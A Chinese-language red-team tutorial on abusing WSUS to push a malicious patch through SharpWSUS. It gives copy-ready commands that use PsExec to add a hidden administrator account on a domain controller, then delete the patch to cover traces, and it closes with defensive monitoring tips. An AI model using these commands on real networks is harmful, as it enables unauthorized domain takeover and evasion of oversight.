WSUS利用
字数 1247 2025-08-06 20:12:44
WSUS利用教学文档
1. WSUS概述
WSUS (Windows Server Update Services) 是微软提供的系统补丁更新解决方案,主要用于大型域环境。
关键特性
- 允许域内机器在不直接连接互联网的情况下通过WSUS Server获取更新
- 使用HTTP(8530端口)和HTTPS(8531端口)与Microsoft通信
- 常见部署模式:
- 单域单WSUS服务器
- 多WSUS服务器架构
2. 攻击原理
利用WSUS服务器推送恶意补丁进行横向渗透,主要针对域内通过WSUS更新的客户端。
3. 攻击前提条件
- 已获取域内一台机器的权限(如示例中的win7机器dm2007)
- 域内存在WSUS服务器(如示例中的WSUS-1)
- 目标机器(如域控DC2)配置为从该WSUS服务器获取更新
4. 攻击步骤详解
4.1 信息收集
定位WSUS服务器方法:
-
注册表查询:
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate -
使用SharpWSUS工具:
SharpWSUS.exe locate
4.2 枚举WSUS服务信息
获取WSUS服务器管理的客户端信息:
SharpWSUS.exe inspect
可获取:
- 管理的计算机列表
- IP地址
- 版本信息
- 上一次更新时间
4.3 创建恶意补丁
关键要点:
- 有效负载必须是Microsoft签名的二进制文件
- 常用工具:PsExec.exe
- 文件必须存储在磁盘上,WSUS Server能访问的位置
示例命令:
SharpWSUS.exe create /payload:"C:\Users\public\psexec.exe" /args:"-accepteula -s -d cmd.exe /c 'net user lzz Qq123456.. /add && net localgroup administrators lzz /add'" /title:"demo01"
说明:
- 补丁中的二进制文件会被保存为wuagent.exe
- updateid是补丁的唯一标识符
4.4 批准补丁并分组
-
创建组并将目标机器加入:
SharpWSUS.exe approve /updateid:ac82689b-f451-4df5-bc1c-3cb653301252 /computername:dc2.redteam.lab /groupname:"Demos" -
验证组创建:
SharpWSUS.exe inspect
4.5 等待补丁应用
重要限制:
- 无法控制客户端何时拉取补丁
- 更新时间由域内WSUS组策略设置(如示例中设置为每天3点)
4.6 清理痕迹
删除恶意补丁:
SharpWSUS.exe delete /updateid:ac82689b-f451-4df5-bc1c-3cb653301252 /computername:dc2.redteam.lab /groupname:"Demos"
5. 攻击成功标志
目标机器安装更新后,恶意补丁执行成功(如示例中在DC2上创建了本地管理员账户lzz)。
6. 防御措施
-
溯源线索:
- wuagent.exe不会被自动删除
- 检查WSUS服务器上的异常二进制文件
-
监控措施:
- 监控WSUS组的创建和删除操作
- 审计WSUS服务器上的补丁审批记录
-
其他防御:
- 限制WSUS服务器的管理权限
- 实施WSUS服务器的访问控制
- 定期审计WSUS配置和补丁
7. 工具说明
SharpWSUS - 用于WSUS攻击的主要工具,功能包括:
- 定位WSUS服务器
- 检查WSUS配置和客户端
- 创建和审批恶意补丁
- 删除补丁和清理痕迹
8. 注意事项
- 攻击成功依赖于客户端实际安装恶意补丁
- 补丁执行时机不可控,取决于客户端配置的更新时间
- 必须使用微软签名的二进制文件作为payload
- 攻击后会留下痕迹(wuagent.exe等)
9. 扩展攻击方式
除了使用PsExec.exe,还可以:
- 使用RunDLL32在网络共享上运行恶意DLL
- 其他微软签名的可被利用的二进制文件
10. 参考架构图
文中提到的两种WSUS架构:
- 单域单WSUS服务器架构
- 域内多WSUS服务器架构
(注:实际教学中应配合架构图进行讲解)